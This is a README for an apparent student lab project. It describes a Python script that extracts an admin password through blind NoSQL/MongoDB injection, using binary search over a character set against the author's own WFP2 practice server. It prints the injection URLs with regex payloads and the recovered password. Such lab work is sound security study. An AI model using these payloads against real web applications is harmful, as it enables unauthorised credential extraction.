# Blind SQL Injection   
By: ***Bar Movshovich***

## Set Up
Before running the program you must first create a virtual environment to work in. Follow the steps listed below in the order in which they appear:
* virtualenv -p python3 env
* source env/bin/activate
* pip3 install -r requirements.txt

Now you should be able to run our program. 
## Algorithm
I took the string "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz" and I split it into two strings. I then sent a request using the first half of the string to the web application and using the initial script we were given I then check whether or not admin was contained within the table that gets returned. If not then I know that the next character in the password must be in the second half of the string. So I then call the same function again however the string I split this time is the previous string that I now know must contain the character I'm looking for. I repeat this process over and over again until eventuall i'm only left with one character. I then store that character into the password string and continue the process with the next character in the password string. After repeating this process several times we are finally left with our password for the admin. 
## Running
To run the program you will need to type the following command followed by the IP address of the web application you are tyring to Blind SQL Inject. 
```python3 blindsql.py <ENTER IP ADDRESS HERE>```
An example would be my WFP2 server's external IP address 35.227.189.188. To run this code on this IP address you would type the following into your console:
```python3 blindsql.py 35.227.189.188```

Below is an example of the output you should expect after running blindsql.py.
```
(env)barmovshovich$ python3 blindsql.py 35.227.189.188

http://35.227.189.188/mongodb/example2/?search=admin%27%26%26%20this.password.match(/^%5B0123456789ABCDEFGHIJKLMNOPQRSTU%5D.*/)//+%00 no match

http://35.227.189.188/mongodb/example2/?search=admin%27%26%26%20this.password.match(/^%5BVWXYZabcdefghijklmnopqrstuvwxyz%5D.*/)//+%00 matched!

http://35.227.189.188/mongodb/example2/?search=admin%27%26%26%20this.password.match(/^%5BVWXYZabcdefghijk%5D.*/)//+%00 matched!

http://35.227.189.188/mongodb/example2/?search=admin%27%26%26%20this.password.match(/^%5BVWXYZabc%5D.*/)//+%00 no match

http://35.227.189.188/mongodb/example2/?search=admin%27%26%26%20this.password.match(/^%5Bdefghijk%5D.*/)//+%00 matched!

http://35.227.189.188/mongodb/example2/?search=admin%27%26%26%20this.password.match(/^%5Bdefg%5D.*/)//+%00 no match

http://35.227.189.188/mongodb/example2/?search=admin%27%26%26%20this.password.match(/^%5Bhijk%5D.*/)//+%00 matched!
                                        . . . 
```
## Results
Running blindsql.py on my WFP2 server's IP address results in an admin password of "icanhazpassw0rd" with the following additional information listed below. 
``` 
http://35.227.189.188/mongodb/example2/?search=admin%27%26%26%20this.password.match(/^icanhazpassw0rd%5B0123456789ABCDEFGHIJKLMNOPQRSTU%5D.*/)//+%00 no match

The admin password is icanhazpassw0rd

number of tests ran: 143

Total time of all tests ran: 17.73283815383911

Average time taken per test is: 0.12400586121565813

(env) Bars-MacBook-Pro:blind-sql-injection barmovshovich$ 
```
Note that the average time taken per test can vary slightly depending on which computer the program is run on. As you can see above, we ran a total of 143 tests with an average test run time of about 0.124 seconds. The program also contains error checking to ensure that if we infinitly loop or there doesn't exist an admin to begin with the program will terminate accordingly. 

